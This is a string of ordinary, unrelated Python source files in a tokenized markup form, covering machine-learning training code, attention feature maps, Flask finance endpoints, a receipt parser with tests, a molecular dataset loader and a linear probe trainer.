<block_end><block_end><def_stmt>evaluate_epoch self eval_tuple:DataTuple iters:int=-1<block_start>self.model.eval()<line_sep>eval_ld=eval_tuple.loader<line_sep>total_loss=0.<line_sep>total_losses=0.<line_sep>uid2ans={}<for_stmt>i,batch enumerate(tqdm(eval_ld))<block_start>loss,losses,logit=self.valid_batch(batch)<line_sep>total_loss<augadd>loss<line_sep>total_losses<augadd>losses<if_stmt>args.task_qa<block_start>score,label=logit.max(1)<for_stmt>uid,l zip(batch["uid"] label.cpu().numpy())<block_start>ans=train_tuple.dataset.answer_table.id2ans(l)<line_sep>uid2ans[uid]=ans<block_end><block_end><if_stmt>i<eq>iters<block_start><break><block_end><block_end><if_stmt>args.local_rank<le>0<block_start>print("The valid loss is %0.4f"%(total_loss/len(eval_ld)))<line_sep>losses_str="The losses are "<line_sep>total_losses=total_losses.squeeze(0)<for_stmt>name,loss zip(LOSSES_NAME total_losses/len(eval_ld))<block_start>losses_str<augadd>"%s: %0.4f "%(name loss)<block_end>print(losses_str)<if_stmt>args.task_qa<block_start>eval_tuple.evaluator.evaluate(uid2ans pprint=<true>)<block_end><block_end><return>total_loss/len(eval_ld)<block_end><def_stmt>save self name<block_start>torch.save(self.model.state_dict() os.path.join(args.output "%s_LXRT.pth"%name))<if_stmt>args.use_separate_optimizer_for_visual<block_start>torch.save(self.optim.optimizers[0].state_dict() os.path.join(args.output "%s_LXRT_AdamOptim.pth"%name))<line_sep>torch.save(self.optim.optimizers[1].state_dict() os.path.join(args.output "%s_LXRT_SGDOptim.pth"%name))<block_end><else_stmt><block_start>torch.save(self.optim.state_dict() os.path.join(args.output "%s_LXRT_AdamOptim.pth"%name))<block_end>torch.save(self.scheduler.state_dict() os.path.join(args.output "%s_LXRT_Scheduler.pth"%name))<block_end><def_stmt>load self path<block_start>print("Load BERT extractor from %s"%path)<line_sep>state_dict=torch.load("%s_LXRT.pth"%path map_location='cpu')<line_sep>'''new_state_dict = {}
for key, value in state_dict.items():
if key.startswith("module."):
new_state_dict[key.replace("module.", "")] = value
else:
new_state_dict[key] = value'''<line_sep>load_state_dict_flexible_with_fp16(self.model state_dict)<line_sep>#self.model.load_state_dict(new_state_dict)
<if_stmt>os.path.exists("{}_LXRT_SGDOptim.pth".format(path))# load sgd
<block_start>print("Load SGD from {}".format("{}_LXRT_SGDOptim.pth".format(path)))<line_sep>sgd_state=torch.load("{}_LXRT_SGDOptim.pth".format(path) map_location='cpu')<line_sep>self.optim.optimizers[-1].load_state_dict(sgd_state)<block_end><if_stmt>args.not_load_adam_optimizer<block_start><pass><block_end><elif_stmt>os.path.exists("{}_LXRT_AdamOptim.pth".format(path))# load sgd
<block_start>print("Load Adam")<line_sep>sgd_state=torch.load("{}_LXRT_AdamOptim.pth".format(path) map_location='cpu')<line_sep>self.optim.optimizers[0].load_state_dict(sgd_state)<block_end><if_stmt>args.not_load_scheduler<block_start><pass><block_end><elif_stmt>os.path.exists("{}_LXRT_Scheduler.pth".format(path))# load sgd
<block_start>print('Load scheduler')<line_sep>sgd_state=torch.load("{}_LXRT_Scheduler.pth".format(path) map_location='cpu')<line_sep>self.scheduler.load_state_dict(sgd_state)<block_end><block_end><def_stmt>load_lxmert self path<block_start>print("Load LXMERT model from %s"%path)<line_sep>state_dict=torch.load("%s_LXRT.pth"%path map_location="cpu")<line_sep># Do not load any answer head
<for_stmt>key list(state_dict.keys())<block_start><if_stmt>'answer'<in>key<block_start>state_dict.pop(key)<block_end><block_end># Change Multi GPU to single GPU
new_state_dict={}<for_stmt>key,value state_dict.items()<block_start><if_stmt>key.startswith("module.")<block_start>new_state_dict[key[len("module."):]]=value<block_end><block_end>state_dict=new_state_dict<line_sep>load_keys=set(state_dict.keys())<line_sep>model_keys=set(self.model.state_dict().keys())<line_sep>print()<line_sep>print("Keys in loaded but not in model:")<for_stmt>key sorted(load_keys.difference(model_keys))<block_start>print(key)<block_end>print()<line_sep>print("Keys in model but not in loaded:")<for_stmt>key sorted(model_keys.difference(load_keys))<block_start>print(key)<block_end>print()<line_sep>load_state_dict_flexible_with_fp16(self.model state_dict)<line_sep>#self.model.load_state_dict(state_dict, strict=False)
<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start><import_stmt>sys<if_stmt>args.gpu<eq>0<block_start>print("\n\n")<line_sep>print(" ".join(sys.argv))<line_sep>print("\n\n")<block_end>lxmert=LXMERT(max_seq_length=20)<line_sep>lxmert.train(train_tuple valid_tuple)<block_end> |
<class_stmt>TimeoutError(Exception)<block_start>"""
Indicates a database operation timed out in some way.
"""<line_sep><pass><block_end> |
#
# Copyright (c) 2020 Idiap Research Institute, http://www.idiap.ch/
# Written by <NAME> <<EMAIL>>
#
"""Create the feature map interface and some commonly used feature maps.
All attention implementations that expect a feature map shall receive a factory
function that returns a feature map instance when called with the query
dimensions.
"""<import_from_stmt>functools partial<import_stmt>torch<import_from_stmt>torch.nn Module<class_stmt>FeatureMap(Module)<block_start>"""Define the FeatureMap interface."""<def_stmt>__init__ self query_dims<block_start>super().__init__()<line_sep>self.query_dims=query_dims<block_end><def_stmt>new_feature_map self device<block_start>"""Create a new instance of this feature map. In particular, if it is a
random feature map sample new parameters."""<line_sep><raise>NotImplementedError()<block_end><def_stmt>forward_queries self x<block_start>"""Encode the queries `x` using this feature map."""<line_sep><return>self(x)<block_end><def_stmt>forward_keys self x<block_start>"""Encode the keys `x` using this feature map."""<line_sep><return>self(x)<block_end><def_stmt>forward self x<block_start>"""Encode x using this feature map. For symmetric feature maps it
suffices to define this function, but for asymmetric feature maps one
needs to define the `forward_queries` and `forward_keys` functions."""<line_sep><raise>NotImplementedError()<block_end>@classmethod<def_stmt>factory cls *args **kwargs<block_start>"""Return a function that when called with the query dimensions returns
an instance of this feature map.
It is inherited by the subclasses so it is available in all feature
maps.
"""<def_stmt>inner query_dims<block_start><return>cls(query_dims *args **kwargs)<block_end><return>inner<block_end><block_end><class_stmt>ActivationFunctionFeatureMap(FeatureMap)<block_start>"""Define a feature map that is simply an element-wise activation
function."""<def_stmt>__init__ self query_dims activation_function<block_start>super().__init__(query_dims)<line_sep>self.activation_function=activation_function<block_end><def_stmt>new_feature_map self device<block_start><return><block_end><def_stmt>forward self x<block_start><return>self.activation_function(x)<block_end><block_end>elu_feature_map=ActivationFunctionFeatureMap.factory(<lambda>x:torch.nn.functional.elu(x)+1)<line_sep> |
# -*- coding: utf-8 -*-
<import_from_stmt>flask request<import_from_stmt>fooltrader.api.esapi esapi<import_from_stmt>fooltrader.rest app<import_from_stmt>fooltrader.rest.common success get_request_params_as_list<line_sep>@app.route('/tech/kdata/<securityid>' methods=['GET'])<def_stmt>get_kdata securityid<block_start>the_date=request.args.get('the_date')<line_sep>start_date=request.args.get('start_date')<line_sep>end_date=request.args.get('end_date')<line_sep>level=request.args.get('level' 'day')<line_sep>fields=request.args.get('fields')<if_stmt><not>fields<block_start>fields=['timestamp' 'open' 'high' 'low' 'close' 'volume']<block_end>from_idx=request.args.get('from_idx' 0)<line_sep>size=request.args.get('size' 500)<line_sep>result=esapi.es_get_kdata(security_item=securityid the_date=the_date start_date=start_date end_date=end_date fields=fields csv=<true> level=level from_idx=int(from_idx) size=int(size))<line_sep><return>success(result)<block_end>@app.route('/tech/statistic/<securityid>' methods=['GET'])<def_stmt>get_statistic securityid<block_start>the_date=request.args.get('the_date')<line_sep>start_date=request.args.get('start_date')<line_sep>end_date=request.args.get('end_date')<line_sep>level=request.args.get('level' 'day')<line_sep>from_idx=request.args.get('from_idx' 0)<line_sep>size=request.args.get('size' 500)<line_sep>result=esapi.es_get_statistic(security_item=securityid the_date=the_date start_date=start_date end_date=end_date level=level from_idx=int(from_idx) size=int(size))<line_sep><return>success(result)<block_end>@app.route('/tech/user_statistic/<main_chain>' defaults={'user_id':<none>} methods=['GET'])@app.route('/tech/user_statistic/<main_chain>/<user_id>' methods=['GET'])<def_stmt>get_user_statistic main_chain user_id<block_start>start_date=request.args.get('start_date')<line_sep>end_date=request.args.get('end_date')<line_sep>security_id=request.args.get('security_id' 'cryptocurrency_contract_RAM-EOS')<line_sep>from_idx=request.args.get('from_idx' 
0)<line_sep>size=request.args.get('size' 100)<line_sep>result=esapi.es_get_user_statistic(main_chain=main_chain security_id=security_id user_id=user_id start_date=start_date end_date=end_date from_idx=int(from_idx) size=int(size))<line_sep><return>success(result)<block_end>@app.route('/tech/account/<main_chain>' defaults={'user_id':<none>} methods=['GET'])@app.route('/tech/account/<main_chain>/<user_id>' methods=['GET'])<def_stmt>get_accounts main_chain user_id<block_start>start_vol=request.args.get('start_vol')<line_sep>end_vol=request.args.get('end_vol')<line_sep>from_idx=request.args.get('from_idx' 0)<line_sep>size=request.args.get('size' 100)<line_sep>order=request.args.get('order' 'totalEos')<line_sep>fields=get_request_params_as_list(request 'fields')<line_sep>result=esapi.es_get_accounts(main_chain=main_chain user_id=user_id start_vol=int(start_vol) fields=fields end_vol=int(end_vol) from_idx=int(from_idx) size=int(size) order=order)<line_sep><return>success(result)<block_end> |
<import_stmt>numpy<as>np<import_stmt>torch<import_from_stmt>models.sentence_embedding_baseline SmoothInverseFrequencyBaseline<import_from_stmt>models.mpcnn MPCNN<import_from_stmt>models.mpcnn_lite MPCNNLite<import_from_stmt>models.bimpm BiMPM<def_stmt>get_model args dataset_cls embedding<block_start><if_stmt>args.model<eq>'sif'<block_start>args.supervised=<not>args.unsupervised<line_sep>args.remove_special_direction=<not>args.no_remove_special_direction<line_sep>model=SmoothInverseFrequencyBaseline(dataset_cls.num_classes args.alpha embedding remove_special_direction=args.remove_special_direction frequency_dataset=args.frequency_dataset supervised=args.supervised)<block_end><elif_stmt>args.model<eq>'mpcnn'<block_start>model=MPCNN(embedding 300 300 20 [1 2 3 np.inf] 150 dataset_cls.num_classes 0.5)<block_end><elif_stmt>args.model<eq>'mpcnn-lite'<block_start>model=MPCNNLite(embedding 300 300 [1 2 3 np.inf] 150 dataset_cls.num_classes 0.5)<block_end><elif_stmt>args.model<eq>'bimpm'<block_start>model=BiMPM(embedding 300 50 20 100 dataset_cls.num_classes 0.1)<block_end><else_stmt><block_start><raise>ValueError(f'Unrecognized dataset: {args.model}')<block_end><if_stmt>args.device<ne>-1<block_start><with_stmt>torch.cuda.device(args.device)<block_start>model=model.cuda()<block_end><block_end><return>model<block_end> |
# -*- coding: utf-8 -*-
<import_stmt>unittest<import_from_stmt>datetime datetime<line_sep>testtext=u"""
k-supermarket länsiväylä
puh. 01042 33900
4 k4 m000004/1939 21:01 28-05-2014
sallinen maapähkinä lkg 4.40
valio rasvaton maito 1,51 1.55
elonen ruisevas 540g 9kpl 1.59
pirkka banaani 0.75
es tonnikalahiutale 185/1409 vedessä 0.79
pirkka maksamakkara 300g 1.00
yhteensä 10.08
korttitapahtuma
kortti visa electron
*mu: *n* *m* 7956 cp
sovellus la us: a000oo00032010
tap.nro/varmennus 00942/151372
yritys/ala 020327326100/5411
autbnt1901ntli cf70d1e6903fcb8a
visa he: 1405223010942
debit/veloitus 10,03 eur
alv veroton vero verollinen
2 14.00% 8.84 1.24 10.08
yhteensä 8.84 1.24 10.08"""<def_stmt>parse_float txt<block_start>""" Returns None or parsed float value. """<line_sep># Floats must have decimal point
<if_stmt>txt.find('.')<eq>-1<block_start><return><none><block_end># Parse float using python's built-in converter
<try_stmt><block_start><return>float(txt)<block_end><except_stmt>ValueError<block_start><return><none><block_end><block_end><def_stmt>parse_date txt<block_start>""" Returns None or parsed date as {h, m, D, M, Y}. """<line_sep>date=<none><line_sep>clock=<none><for_stmt>word txt.split(' ')<block_start><if_stmt>date<is><none><block_start><try_stmt><block_start>date=datetime.strptime(word "%d-%m-%Y")<line_sep><continue><block_end><except_stmt>ValueError<block_start><pass><block_end><try_stmt><block_start>date=datetime.strptime(word "%d.%m.%Y")<line_sep><continue><block_end><except_stmt>ValueError<block_start><pass><block_end><block_end><if_stmt>clock<is><none><block_start><try_stmt><block_start>clock=datetime.strptime(word "%H:%M")<line_sep><continue><block_end><except_stmt>ValueError<block_start><pass><block_end><block_end><block_end><if_stmt>date<is><not><none><and>clock<is><not><none><block_start><return>{'h':clock.hour 'm':clock.minute 'D':date.day 'M':date.month 'Y':date.year}<block_end><return><none><block_end><def_stmt>parse_product_line txt<block_start>""" Returns None or {name, price}
Example: { name:'<NAME>', price: 0.75 }
"""<line_sep>invalid_starts=['yhtee' 'k-plussa' 'plussaa']<line_sep>words=txt.split(' ')<if_stmt>len(words)<ge>2# Lines starting with any of invalid_starts are not products
<block_start><if_stmt><not>any([words[0].startswith(s)<for>s invalid_starts])# Price is the last word of the line
<block_start>price=parse_float(words[-1])<if_stmt>price<is><not><none><block_start>product_name=' '.join(words[0:-1])<line_sep># Calculate percentage of digits in product_name
number_acc=<lambda>acc c:acc+(1<if>c.isdigit()<else>0)<line_sep>characters=float(len(product_name))<line_sep>digit_percent=reduce(number_acc product_name 0)/characters<line_sep># Names with over 50% digits are not product names
<if_stmt>digit_percent<g>0.5<block_start><return><none><block_end><return>{'name':product_name 'price':float("{0:.2f}".format(price))}<block_end><block_end><block_end><return><none><block_end><def_stmt>parse_sum txt<block_start>""" Returns None or total sum as float. """<line_sep>words=txt.split(' ')<if_stmt>len(words)<ge>2<block_start><if_stmt>words[0].startswith('yhtee')# Try float parsing
<block_start>total_sum=parse_float(words[-1])<if_stmt>total_sum<is><not><none># Return sum with 2 decimal precision
<block_start><return>float("{0:.2f}".format(total_sum))<block_end><block_end><block_end><return><none><block_end><def_stmt>parse_credit_card txt<block_start>""" Returns None or True. """<if_stmt>txt.startswith('korttitapahtuma')<block_start><return><true><block_end><return><none><block_end><def_stmt>preprocess txt<block_start>""" Removes empty lines and unnecessary whitespace. """<line_sep><return>[line.strip()<for>line txt.splitlines()<if>line.strip()<ne>""]<block_end><def_stmt>parse_receipt txt<block_start>""" Parses receipt and returns parsed data. """<line_sep>result={'products':[] 'date':<none> 'total_sum':<none> 'shop_name':<none> 'credit_card':<false>}<line_sep>preprocessed_lines=preprocess(txt)<if_stmt>len(preprocessed_lines)<eq>0<block_start><return>result<block_end>result['shop_name']=preprocessed_lines[0]<for_stmt>line preprocessed_lines<block_start>parsed_product=parse_product_line(line)<if_stmt>parsed_product<is><not><none><block_start>result['products'].append(parsed_product)<block_end>parsed_sum=parse_sum(line)<if_stmt>parsed_sum<is><not><none><block_start>result['total_sum']=parsed_sum<block_end>parsed_card=parse_credit_card(line)<if_stmt>parsed_card<is><not><none><block_start>result['credit_card']=parsed_card<block_end>parsed_date=parse_date(line)<if_stmt>parsed_date<is><not><none><block_start>result['date']=parsed_date<block_end><block_end><return>result<block_end><class_stmt>ParserTest(unittest.TestCase)<block_start>""" Tests all receipt parser functions. """<def_stmt>test_float self<block_start>""" Tests parse_float """<line_sep>test=<lambda>inp expected:self.assertEqual(parse_float(inp) expected)<line_sep># Valid floats
test('0.00' 0.0)<line_sep>test('13.75' 13.75)<line_sep>test(u'0.05' 0.05)<line_sep># Invalid floats
test('' <none>)<line_sep>test(' ' <none>)<line_sep>test('abc' <none>)<block_end><def_stmt>test_product_line self<block_start>""" Tests parse_product_line """<line_sep>test=<lambda>inp expected:self.assertEqual(parse_product_line(inp) expected)<line_sep># Valid product lines
test('valio rasvaton maito 1,5l 1.55' {'name':'valio rasvaton maito 1,5l' 'price':1.55})<line_sep>test('pirkka maksamakkara 300g 1.00' {'name':'pirkka maksamakkara 300g' 'price':1.00})<line_sep>test(u'sallinen maapähkinä 1kg 4.40' {'name':u'sallinen maapähkinä 1kg' 'price':4.4})<line_sep># Invalid product lines
test('4 k4 m000004/1939 21:01 28-05-2014' <none>)<line_sep>test('yhteensä 8.84 1.24 10.08' <none>)<line_sep>test('puh. 01042 33900' <none>)<line_sep>test(u'korttitapahtuma' <none>)<line_sep>test("2 14.0q% 9.95 1.39 11.34" <none>)<block_end><def_stmt>test_sum self<block_start>""" Tests parse_sum """<line_sep>test=<lambda>inp expected:self.assertEqual(parse_sum(inp) expected)<line_sep># Valid sums
test(u'yhteensä 15.62' 15.62)<line_sep>test(u'yhteensä 61.00' 61.00)<line_sep># Invalid sums
test(u'yhteensä 6i 00' <none>)<line_sep>test('' <none>)<block_end><def_stmt>test_date self<block_start>""" Tests parse_date """<line_sep>test=<lambda>inp expected:self.assertEqual(parse_date(inp) expected)<line_sep># Valid dates
test('15:57 27-07-2014' {'h':15 'm':57 'D':27 'M':7 'Y':2014})<line_sep>test('16.07.2014 23:15' {'h':23 'm':15 'D':16 'M':7 'Y':2014})<line_sep># Invalid dates
test('64:99 12-13-2014' <none>)<line_sep>test('abc' <none>)<line_sep>test(' ' <none>)<line_sep>test('' <none>)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end> |
# -*- coding: utf-8 -*-
#
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Creating datasets from .csv files for molecular property prediction.
<import_stmt>dgl.backend<as>F<import_stmt>numpy<as>np<import_stmt>os<import_stmt>pandas<as>pd<import_stmt>torch<import_from_stmt>dgl.data.utils save_graphs load_graphs<import_from_stmt>..utils.io pmap<line_sep>__all__=['MoleculeCSVDataset']<class_stmt>MoleculeCSVDataset(object)<block_start>"""MoleculeCSVDataset
This is a general class for loading molecular data from :class:`pandas.DataFrame`.
In data pre-processing, we construct a binary mask indicating the existence of labels.
All molecules are converted into DGLGraphs. After the first-time construction, the
DGLGraphs can be saved for reloading so that we do not need to reconstruct them every time.
Parameters
----------
df: pandas.DataFrame
Dataframe including smiles and labels. Can be loaded by pandas.read_csv(file_path).
One column includes smiles and some other columns include labels.
smiles_to_graph: callable, str -> DGLGraph
A function turning a SMILES string into a DGLGraph.
node_featurizer : None or callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for nodes like atoms in a molecule, which can be used to update
ndata for a DGLGraph.
edge_featurizer : None or callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for edges like bonds in a molecule, which can be used to update
edata for a DGLGraph.
smiles_column: str
Column name for smiles in ``df``.
cache_file_path: str
Path to store the preprocessed DGLGraphs. For example, this can be ``'dglgraph.bin'``.
task_names : list of str or None, optional
Columns in the data frame corresponding to real-valued labels. If None, we assume
all columns except the smiles_column are labels. Default to None.
load : bool, optional
Whether to load the previously pre-processed dataset or pre-process from scratch.
``load`` should be False when we want to try different graph construction and
featurization methods and need to preprocess from scratch. Default to False.
log_every : bool, optional
Print a message every time ``log_every`` molecules are processed. It only comes
into effect when :attr:`n_jobs` is greater than 1. Default to 1000.
init_mask : bool, optional
Whether to initialize a binary mask indicating the existence of labels. Default to True.
n_jobs : int, optional
The maximum number of concurrently running jobs for graph construction and featurization,
using joblib backend. Default to 1.
error_log : str, optional
Path to a CSV file of molecules that RDKit failed to parse. If not specified,
the molecules will not be recorded.
"""<def_stmt>__init__ self df smiles_to_graph node_featurizer edge_featurizer smiles_column cache_file_path task_names=<none> load=<false> log_every=1000 init_mask=<true> n_jobs=1 error_log=<none><block_start>self.df=df<line_sep>self.smiles=self.df[smiles_column].tolist()<if_stmt>task_names<is><none><block_start>self.task_names=self.df.columns.drop([smiles_column]).tolist()<block_end><else_stmt><block_start>self.task_names=task_names<block_end>self.n_tasks=len(self.task_names)<line_sep>self.cache_file_path=cache_file_path<line_sep>self._pre_process(smiles_to_graph node_featurizer edge_featurizer load log_every init_mask n_jobs error_log)<line_sep># Only useful for binary classification tasks
self._task_pos_weights=<none><block_end><def_stmt>_pre_process self smiles_to_graph node_featurizer edge_featurizer load log_every init_mask n_jobs error_log<block_start>"""Pre-process the dataset
* Convert molecules from smiles format into DGLGraphs
and featurize their atoms
* Set missing labels to be 0 and use a binary masking
matrix to mask them
Parameters
----------
smiles_to_graph : callable, SMILES -> DGLGraph
Function for converting a SMILES (str) into a DGLGraph.
node_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for nodes like atoms in a molecule, which can be used to update
ndata for a DGLGraph.
edge_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for edges like bonds in a molecule, which can be used to update
edata for a DGLGraph.
load : bool
Whether to load the previously pre-processed dataset or pre-process from scratch.
``load`` should be False when we want to try different graph construction and
featurization methods and need to preprocess from scratch. Default to True.
log_every : bool
Print a message every time ``log_every`` molecules are processed. It only comes
into effect when :attr:`n_jobs` is greater than 1.
init_mask : bool
Whether to initialize a binary mask indicating the existence of labels.
n_jobs : int
Degree of parallelism for pre processing. Default to 1.
error_log : str
Path to a CSV file of molecules that RDKit failed to parse. If not specified,
the molecules will not be recorded.
"""<if_stmt>os.path.exists(self.cache_file_path)<and>load# DGLGraphs have been constructed before, reload them
<block_start>print('Loading previously saved dgl graphs...')<line_sep>self.graphs,label_dict=load_graphs(self.cache_file_path)<line_sep>self.labels=label_dict['labels']<if_stmt>init_mask<block_start>self.mask=label_dict['mask']<block_end>self.valid_ids=label_dict['valid_ids'].tolist()<block_end><else_stmt><block_start>print('Processing dgl graphs from scratch...')<if_stmt>n_jobs<g>1<block_start>self.graphs=pmap(smiles_to_graph self.smiles node_featurizer=node_featurizer edge_featurizer=edge_featurizer n_jobs=n_jobs)<block_end><else_stmt><block_start>self.graphs=[]<for_stmt>i,s enumerate(self.smiles)<block_start><if_stmt>(i+1)%log_every<eq>0<block_start>print('Processing molecule {:d}/{:d}'.format(i+1 len(self)))<block_end>self.graphs.append(smiles_to_graph(s node_featurizer=node_featurizer edge_featurizer=edge_featurizer))<block_end><block_end># Keep only valid molecules
self.valid_ids=[]<line_sep>graphs=[]<line_sep>failed_mols=[]<for_stmt>i,g enumerate(self.graphs)<block_start><if_stmt>g<is><not><none><block_start>self.valid_ids.append(i)<line_sep>graphs.append(g)<block_end><else_stmt><block_start>failed_mols.append((i self.smiles[i]))<block_end><block_end><if_stmt>error_log<is><not><none><block_start><if_stmt>len(failed_mols)<g>0<block_start>failed_ids,failed_smis=map(list zip(*failed_mols))<block_end><else_stmt><block_start>failed_ids,failed_smis=[] []<block_end>df=pd.DataFrame({'raw_id':failed_ids 'smiles':failed_smis})<line_sep>df.to_csv(error_log index=<false>)<block_end>self.graphs=graphs<line_sep>_label_values=self.df[self.task_names].values<line_sep># np.nan_to_num will also turn inf into a very large number
self.labels=F.zerocopy_from_numpy(np.nan_to_num(_label_values).astype(np.float32))[self.valid_ids]<line_sep>valid_ids=torch.tensor(self.valid_ids)<if_stmt>init_mask<block_start>self.mask=F.zerocopy_from_numpy((~np.isnan(_label_values)).astype(np.float32))[self.valid_ids]<line_sep>save_graphs(self.cache_file_path self.graphs labels={'labels':self.labels 'mask':self.mask 'valid_ids':valid_ids})<block_end><else_stmt><block_start>self.mask=<none><line_sep>save_graphs(self.cache_file_path self.graphs labels={'labels':self.labels 'valid_ids':valid_ids})<block_end><block_end>self.smiles=[self.smiles[i]<for>i self.valid_ids]<block_end><def_stmt>__getitem__ self item<block_start>"""Get datapoint with index
Parameters
----------
item : int
Datapoint index
Returns
-------
str
SMILES for the ith datapoint
DGLGraph
DGLGraph for the ith datapoint
Tensor of dtype float32 and shape (T)
Labels of the datapoint for all tasks
Tensor of dtype float32 and shape (T), optional
Binary masks indicating the existence of labels for all tasks. This is only
generated when ``init_mask`` is True in the initialization.
"""<if_stmt>self.mask<is><not><none><block_start><return>self.smiles[item] self.graphs[item] self.labels[item] self.mask[item]<block_end><else_stmt><block_start><return>self.smiles[item] self.graphs[item] self.labels[item]<block_end><block_end><def_stmt>__len__ self<block_start>"""Size for the dataset
Returns
-------
int
Size for the dataset
"""<line_sep><return>len(self.smiles)<block_end><def_stmt>task_pos_weights self indices<block_start>"""Get weights for positive samples on each task
This should only be used when all tasks are binary classification.
It's quite common that the number of positive samples and the number of
negative samples are significantly different for binary classification.
To compensate for the class imbalance issue, we can weight each datapoint
in loss computation.
In particular, for each task we will set the weight of negative samples
to be 1 and the weight of positive samples to be the number of negative
samples divided by the number of positive samples.
Parameters
----------
indices : 1D LongTensor
The function will compute the weights on the data subset specified by
the indices, e.g. the indices for the training set.
Returns
-------
Tensor of dtype float32 and shape (T)
Weight of positive samples on all tasks
"""<line_sep>task_pos_weights=torch.ones(self.labels.shape[1])<line_sep>num_pos=F.sum(self.labels[indices] dim=0)<line_sep>num_indices=F.sum(self.mask[indices] dim=0)<line_sep>task_pos_weights[num_pos<g>0]=((num_indices-num_pos)/num_pos)[num_pos<g>0]<line_sep><return>task_pos_weights<block_end><block_end> |
<def_stmt>test_lint <block_start><import_stmt>nose.plugins.isolate<block_end> |
# __init__.py/Open GoPro, Version 2.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Tue Sep 7 21:35:53 UTC 2021
"""Universal WiFi adapter implementation for Open GoPro WiFi interface"""<import_from_stmt>.wireless Wireless<line_sep> |
<import_stmt>torch<import_from_stmt>torch nn<import_from_stmt>.utils EarlyStopping appendabledict calculate_multiclass_accuracy calculate_multiclass_f1_score append_suffix compute_dict_average<import_from_stmt>copy deepcopy<import_stmt>numpy<as>np<import_from_stmt>torch.utils.data RandomSampler BatchSampler<import_from_stmt>.categorization summary_key_dict<class_stmt>LinearProbe(nn.Module)<block_start><def_stmt>__init__ self input_dim num_classes=255<block_start>super().__init__()<line_sep>self.model=nn.Linear(in_features=input_dim out_features=num_classes)<block_end><def_stmt>forward self feature_vectors<block_start><return>self.model(feature_vectors)<block_end><block_end><class_stmt>FullySupervisedLinearProbe(nn.Module)<block_start><def_stmt>__init__ self encoder num_classes=255<block_start>super().__init__()<line_sep>self.encoder=deepcopy(encoder)<line_sep>self.probe=LinearProbe(input_dim=self.encoder.hidden_size num_classes=num_classes)<block_end><def_stmt>forward self x<block_start>feature_vec=self.encoder(x)<line_sep><return>self.probe(feature_vec)<block_end><block_end><class_stmt>ProbeTrainer()<block_start><def_stmt>__init__ self encoder=<none> method_name="my_method" wandb=<none> patience=15 num_classes=256 fully_supervised=<false> save_dir=".models" device=torch.device("cuda"<if>torch.cuda.is_available()<else>"cpu") lr=5e-4 epochs=100 batch_size=64 representation_len=256<block_start>self.encoder=encoder<line_sep>self.wandb=wandb<line_sep>self.device=device<line_sep>self.fully_supervised=fully_supervised<line_sep>self.save_dir=save_dir<line_sep>self.num_classes=num_classes<line_sep>self.epochs=epochs<line_sep>self.lr=lr<line_sep>self.batch_size=batch_size<line_sep>self.patience=patience<line_sep>self.method=method_name<line_sep>self.feature_size=representation_len<line_sep>self.loss_fn=nn.CrossEntropyLoss()<line_sep># bad convention, but these get set in "create_probes"
self.probes=self.early_stoppers=self.optimizers=self.schedulers=<none><block_end><def_stmt>create_probes self sample_label<block_start><if_stmt>self.fully_supervised<block_start><assert_stmt>self.encoder<ne><none> "for fully supervised you must provide an encoder!"<line_sep>self.probes={k:FullySupervisedLinearProbe(encoder=self.encoder num_classes=self.num_classes).to(self.device)<for>k sample_label.keys()}<block_end><else_stmt><block_start>self.probes={k:LinearProbe(input_dim=self.feature_size num_classes=self.num_classes).to(self.device)<for>k sample_label.keys()}<block_end>self.early_stoppers={k:EarlyStopping(patience=self.patience verbose=<false> name=k+"_probe" save_dir=self.save_dir)<for>k sample_label.keys()}<line_sep>self.optimizers={k:torch.optim.Adam(list(self.probes[k].parameters()) eps=1e-5 lr=self.lr)<for>k sample_label.keys()}<line_sep>self.schedulers={k:torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizers[k] patience=5 factor=0.2 verbose=<true> mode='max' min_lr=1e-5)<for>k sample_label.keys()}<block_end><def_stmt>generate_batch self episodes episode_labels<block_start>total_steps=sum([len(e)<for>e episodes])<assert_stmt>total_steps<g>self.batch_size<line_sep>print('Total Steps: {}'.format(total_steps))<line_sep># Episode sampler
# Sample `num_samples` episodes then batchify them with `self.batch_size` episodes per batch
sampler=BatchSampler(RandomSampler(range(len(episodes)) replacement=<true> num_samples=total_steps) self.batch_size drop_last=<true>)<for_stmt>indices sampler<block_start>episodes_batch=[episodes[x]<for>x indices]<line_sep>episode_labels_batch=[episode_labels[x]<for>x indices]<line_sep>xs,labels=[] appendabledict()<for_stmt>ep_ind,episode enumerate(episodes_batch)# Get one sample from this episode
<block_start>t=np.random.randint(len(episode))<line_sep>xs.append(episode[t])<line_sep>labels.append_update(episode_labels_batch[ep_ind][t])<block_end><yield>torch.stack(xs).float().to(self.device)/255. labels<block_end><block_end><def_stmt>probe self batch k<block_start>probe=self.probes[k]<line_sep>probe.to(self.device)<if_stmt>self.fully_supervised# if method is supervised batch is a batch of frames and probe is a full encoder + linear or nonlinear probe
<block_start>preds=probe(batch)<block_end><elif_stmt><not>self.encoder# if encoder is None then inputs are vectors
<block_start>f=batch.detach()<assert_stmt>len(f.squeeze().shape)<eq>2 "if input is not a batch of vectors you must specify an encoder!"<line_sep>preds=probe(f)<block_end><else_stmt><block_start><with_stmt>torch.no_grad()<block_start>self.encoder.to(self.device)<line_sep>f=self.encoder(batch).detach()<block_end>preds=probe(f)<block_end><return>preds<block_end><def_stmt>do_one_epoch self episodes label_dicts<block_start>sample_label=label_dicts[0][0]<line_sep>epoch_loss,accuracy={k+"_loss":[]<for>k sample_label.keys()<if><not>self.early_stoppers[k].early_stop} {k+"_acc":[]<for>k sample_label.keys()<if><not>self.early_stoppers[k].early_stop}<line_sep>data_generator=self.generate_batch(episodes label_dicts)<for_stmt>step,(x labels_batch) enumerate(data_generator)<block_start><for_stmt>k,label labels_batch.items()<block_start><if_stmt>self.early_stoppers[k].early_stop<block_start><continue><block_end>optim=self.optimizers[k]<line_sep>optim.zero_grad()<line_sep>label=torch.tensor(label).long().to(self.device)<line_sep>preds=self.probe(x k)<line_sep>loss=self.loss_fn(preds 